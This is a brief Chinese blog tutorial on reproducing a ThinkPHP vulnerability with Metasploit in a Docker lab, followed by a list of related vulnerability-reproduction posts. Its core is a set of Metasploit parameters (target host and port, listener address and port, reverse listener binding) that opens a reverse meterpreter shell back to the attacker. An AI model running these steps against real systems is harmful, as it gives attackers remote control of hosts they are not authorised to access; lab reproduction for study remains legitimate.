MSF复现Thinkphp漏洞

桃扇骨 2023-10-07 23:35 134阅读 0赞

简介

ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架，诞生于2006年初，原名FCS，2007年元旦正式更名为ThinkPHP，遵循Apache2开源协议发布，从Struts结构移植过来并做了改进和完善，同时也借鉴了国外很多优秀的框架和模式，使用面向对象的开发结构和MVC模式，融合了Struts的思想和TagLib（标签库）、RoR的ORM映射和ActiveRecord模式。

ThinkPHP可以支持windows/Unix/Linux等服务器环境，正式版需要PHP5.0以上版本支持，支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展，ThinkPHP框架本身没有什么特别模块要求，具体的应用系统运行环境要求视开发所涉及的模块。 —百度百科

搭建环境

使用docker搭建

打开MSF工具

设置参数：

set rhosts 靶机IP
set rport 靶场端口

set LHOST 侦听地址

set LPORT 侦听端口

Exploit target: 默认Linux

set reverselistenerbindaddress 攻击机IP #绑定反向侦听器地址

run

meterperter操作命令请参考：命令使用

发表评论取消回复

表情：

评论列表（有 0 条评论，134人围观）

还没有评论，来说两句吧...

相关阅读

相关 ThinkPHP 5.x远程命令执行漏洞分析与复现

0x00 前言 ThinkPHP官方2018年12月9日发布重要的[安全更新][Link 1]，修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新，由于框架对控

绝地灬酷狼/ 2024年04月07日 10:55/ 0 赞/ 160 阅读

相关 MSF复现Thinkphp漏洞

简介 ThinkPHP是一个快速、兼容而且简单的轻量级国产[PHP开发框架][PHP]，诞生于2006年初，原名FCS，2007年元旦正式更名为ThinkPHP，遵循Ap

桃扇骨/ 2023年10月07日 23:35/ 0 赞/ 135 阅读

相关 MSF复现MS17-010漏洞（永恒之蓝）

MS17-010漏洞复现复现环境攻击机:kali 靶机:windows 7 使用工具：Metasploit Metasploit简介 Metasploit

雨点打透心脏的1/2处/ 2023年10月07日 23:06/ 0 赞/ 89 阅读

相关 Thinkphp漏洞复现

Thinkphp简介 Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。很多cms就是

逃离我推掉我的手/ 2023年10月07日 22:07/ 0 赞/ 110 阅读

相关 Tomcat漏洞复现

目录一、Tomcat任意文件读写漏洞（CVE-2017-12615） 1、漏洞描述 2、影响范围 3、漏洞分析

青旅半醒/ 2023年10月06日 21:12/ 0 赞/ 161 阅读

相关 Fastjson漏洞复现

目录简介 CVE-2017-18349（Fastjson v1.2.24远程命令执行）漏洞简介漏洞环境漏洞复现

不念不忘少年蓝@/ 2023年10月06日 19:36/ 0 赞/ 154 阅读

相关 fastjson 漏洞复现

可能从fastjson“盘古开天地”开始讲，因为我对序列化反序列化还有那些组件非常不熟悉（谁不搞开发会对这些熟悉）也算复习一下java知识吧，之前好像我自己大二学习java序

系统管理员/ 2023年02月24日 15:23/ 0 赞/ 95 阅读

相关 ThinkPHP远程命令执行漏洞原理及复现

2018年12月11日，exploit-db更新了一个thinkphp框架远程代码执行漏洞 exploit地址：[https://www.exploit-db.com/ex

超、凢脫俗/ 2022年10月02日 10:46/ 0 赞/ 515 阅读

相关漏洞复现之xxe漏洞

文章目录 XXE-基础实验实验内容实验步骤 1.访问目标进行注入攻击

向右看齐/ 2022年08月29日 10:51/ 0 赞/ 395 阅读

相关 XSS漏洞复现

XSS漏洞复现实验环境DVWA > XSS(cross site script) 跨站脚本。属于代码执行的一种，这里执行的是前端代码，一般是javascript代码。

迷南。/ 2021年09月21日 05:16/ 0 赞/ 634 阅读